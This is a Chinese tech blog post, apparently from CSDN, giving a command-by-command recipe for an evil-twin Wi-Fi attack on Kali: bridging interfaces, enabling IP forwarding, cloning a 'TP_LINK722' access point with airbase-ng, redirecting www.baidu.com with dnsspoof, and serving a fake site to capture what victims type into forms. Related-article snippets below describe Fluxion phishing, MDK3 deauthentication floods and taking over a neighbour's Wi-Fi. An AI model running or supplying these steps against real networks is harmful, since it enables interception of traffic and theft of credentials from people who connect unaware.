伪造无线AP热点流程,DNS劫持

最新推荐文章于 2024-02-04 21:47:53 发布
最新推荐文章于 2024-02-04 21:47:53 发布
阅读量1.7k 收藏 7
点赞数 1
分类专栏: 渗透 kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/winux123/article/details/103413180
版权
渗透 同时被 2 个专栏收录
14 篇文章 2 订阅
订阅专栏
kali
14 篇文章 1 订阅
订阅专栏

第一步:进入Monitor 模式(前面几篇文章有说明)

第二步:伪造AP:

安装无线网卡桥接包   apt-get install bridge-utils

添加网桥   brctl addbr bridge

先把连接网络的网卡添加到网桥里面 brctl addif bridge eth0  #eth0 是已经连接网络的网卡,可以是有线网卡或者无线网卡

把自己伪造AP的无线网卡添加到网桥里面 brctl addif bridge at0 #at0 伪造AP的无线网卡

清除网卡的IP地址  ifconfig eth0 0.0.0.0 up 

清除AP网卡的IP地址  ifconfig at0 0.0.0.0 up 

给桥接接口分配IP地址  ifconfig bridge 192.168.1.10 up

添加网关 route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1

启动IP转发 echo 1 > /proc/sys/net/ipv4/ip_forward

进行AP伪造:airbase-ng -c 11 --essid TP_LINK722 wla0mon  # -c 指定信道  --essid 要伪造成的AP  wlan0mon 使用的网卡

第三步:DNS欺骗

dnsspoof -i bridge -f dnsspoof.hosts  #-i 使用欺骗的网桥 -f 进行欺骗 域名网址配置文件(该配置文件的格式可以参考

/usr/share/dsniff/dnsspoof.hosts) 例如: 192.168.1.110    www.baidu.com 把访问百度的请求转向本机伪造的地址

然后启动apach服务   apachet2ctl start 

下面步骤就要伪造自己想要的网站,等用户填写信息提交表单:

 

 

 

 

 

鱼与羽
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
无线渗透_伪造流氓AP
分享学习网络的点点滴滴
07-08 422
蹭网与被蹭网北上广20%的公共场所无线网络是伪造的 安装无线网卡和有线网卡的桥接工具 安装好之后新建一个桥 将物理网卡加入桥中 将伪造AP加入桥中 注意:at0是伪造AP接口 给网桥分配IP地址 添加路由 开启IP转发 别人连接之后可进行DNS欺骗 注:格式可参考/usr/share/dsniff/dnsspoof.hosts...
实战-Fluxion与wifi热点伪造、钓鱼、中间人攻击、wifi破解
热门推荐
玄魂工作室
08-18 3万+
a.扫描能够接收到的WIFI信号 b.抓取握手包(这一步的目的是为了验证WiFi密码是否正确) c.使用WEB接口 d.启动一个假的AP实例来模拟原本的接入点 e.然后会生成一个MDK3进程。如果普通用户已经连接到这个WiFi,也会输入WiFi密码 f.随后启动一个模拟的DNS服务器并且抓取所有的DNS请求,会把请求重新定向到一个含有恶意脚本的HOST地址 g.随后会弹出一个窗口提示用户输入正确的WiFi密码 h.用户输入的密码将和第二步抓到的握手包做比较来核实密码是否正确 j.这个程序是自动化运行的,并且
MKD3用法之一构造虚假WIFI热点
西部壮仔的博客
07-07 2295
工具:kali(带有无线网卡) 1.创建一个文本,里面写着你想伪造的wifi热点的名字 2.把网卡设置为监听模式 airmon-ng start wlan0 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200707104207138.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1MDg5NTc
伪造无线AP的几种方法
D.K专栏
04-01 1万+
伪造无线AP的几种方法
简单的进行DNS劫持
Dream丶Boy
01-06 5371
在终端输入:vim /etc/ettercap/etter.dns来编辑dns文件,可以删除里面所有的内容,因为都是演示, 可以新增你需要劫持的域名和目标IP,格式和host文件一致 www.baidu.com A 192.168.1.101 上面的www.baidu.com是目标域名,A是解析的方式,后面的IP就是我们的IP。 在终端输入:ettercap -G启动ettercap客户端 选择网卡后点击右上角启动,启动后,左上角点击放大镜进行扫描 然后点击放大镜右边的服务器列表可以看见所有在线的机器,
[黑科技]DNS隧道-绕过wifi热点登陆免费上网
Anem0ne的博客
10-02 1万+
[黑科技]DNS隧道-绕过wifi热点登陆免费上网
airssl:使用 Airssl 脚本伪造 Ap
06-19
在 Ubuntu 14.04 及更低版本上工作,如果您不是以太网,则需要两个无线网卡。 所需的包 Driftnet、Ettercap、DHCP、Aircrack 和 SSLStrip $ su root $ apt-get update $ apt-get upgrade $ apt-get install ...
fake-ap:伪造AP模块,可帮助开发和测试Atlassian Connect应用程序
03-29
AP 伪造AP模块,可帮助开发和测试Atlassian Connect应用程序。介绍Atlassian Connect应用程序通常使用 (也称为AP )来克服由于Atlassian页面上的iframe中存在的应用程序带来的限制。 通常通过调用以下脚本来...
易语言伪造请求ip 伪造请求ip 网页访问伪造ip
03-09
易语言伪造网页访问ip地址 结合HTTP扩展请求头 X-Forwarded-For 可以对客户端IP进行伪造 X-Forwarded-For 是一个 HTTP 扩展头部,用来表示HTTP请求端真实 IP,HTTP/1.1 协议并没有对它的定义,但现如今X-Forwarded-...
:satellite_antenna:一个Python程序,用于创建伪造AP和嗅探数据。-Python开发
05-25
_ _ ___ ______(_)| / _ \ | ___ \ _ __ ___ _ | | _ _ __ ___ / / _ \ \\ | _ / / | '_`_ \ | | __ | '_`_ \ | _ || __ / | | ...用于创建伪造AP和嗅探数据的python程序。 2.0中的新增功能:用
如何解决无线局域网内伪造DHCP服务器攻击.pdf
11-27
其次,使用telnet命令登录AC,通过display wlan client |in命令查看无线路由器接入的AP,查找伪造DHCP服务器的IP地址。 最后,我们可以通过禁用DHCP服务器功能或更改DHCP服务器的设置来防范伪造DHCP服务器攻击。 ...
ubuntu-16.04使用MDK3伪造wifi热点和攻击wifi热点至死
dianyan5615的博客
11-20 725
  MDK3是?   MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试等功能   安装MDK3   打开文件 /etc/apt/sources.list ,添加...
kali无线渗透之创建伪ap和mdk3踢客户端下线和捕获数据包5
最新发布
2301_80361487的博客
02-04 1238
AP模式是最基本,又是最常用的工作模式,用于构建以无线AP为中心的集中控制式网络,所有通信都通过AP来转发。此时,AP既可以和无线网卡建立无线连接,也可以和有线网卡通过无线建立有线连接。纯AP的工作模式如图。
【Kali安全渗透测试实践教程】第9章 无线网络渗透
小原的博客
08-09 2018
【Kali安全渗透测试实践教程】第9章 无线网络渗透
HTTPS 降级攻击的场景剖析与解决之道
weixin_33712987的博客
12-13 496
原文地址:HTTPS 降级攻击的场景剖析与解决之道博客地址:blog.720ui.com/ HTTPS 一定安全么 HTTP 协议,本身是明文传输的,没有经过任何安全处理。那么这个时候就很容易在传输过程中被中间者窃听、篡改、冒充等风险。这里提到的中间者主要指一些网络节点,是用户数据在浏览器和服务器中间传输必须要经过的节点,比如 WIFI 热点,路由器,防火墙,反向代理,缓存服务器等。HTTP ...
Kali Linux无线安全测试实践
08-09
课程中将针对802.11 Wifi为主要测试目标,讲解常规Wifi密码探测技术,确保学员能够掌握如何测试Wifi网络安全从而达到维护WIFI安全的目的。为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。
如何把设备安全的接入AWS IoT(二)
fishmai的专栏
12-15 382
请想象一下这样的情景:你可以任意伪造很多个WiFi热点,然后穿梭在人群中,你身边的人搜索WiFi热点时,满屏幕都是你伪造的WiFi热点,比如这样: (上图中“1.此广告位招租” “2.楼上是傻逼” “3.嫁人就嫁程序员”三个热点就是我伪造的) 你可以用这种技术来广播各种信息,比如表白或求炮友咳咳。当然,这些接入点是无法连接上的,因为它们都是假的! 想知道这是怎么做到的吗? 那就一步步跟着学吧~ 对了,先说明一下,这个技术只能在linux上使用,而且对无线网卡也有一定的挑剔,具体的下面会讲~ =
实战-Fluxion与wifi热点伪造、钓鱼、wifi破解
Hungchuiho的博客
08-28 8564
今天周末遇到了断网,听说是修路挖到了电缆,作为难得的周末没网是不能接受的,这时我盯上了邻居家的WiFi,奈何又没密码,只能动手白嫖一下了。 现在的家用路由器支持WiFi一般是wpa/wpa2,没有连接密码我们只能做Deauthentication,即解除认证攻击(aireplay-ng -0),此攻击会给已连接上接入点的用户发送断开包(导致用户和接入点断开连接)。简单说就是对wifi进行ddos,但是断网并不是我想要的,我的目的是获取到邻居的WiFi密码。所以就是如何获得wifi密码。 一、 wifi万能钥
dns劫持有什么危害?如何解决?
04-25
DNS劫持是指攻击者通过非法手段篡改了DNS查询结果,使用户在访问目标网站时被重定向到恶意网站,从而获取用户的敏感信息,或者是利用用户的计算机进行网络攻击。DNS劫持的危害非常大,不仅会损害用户的网络安全,还...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值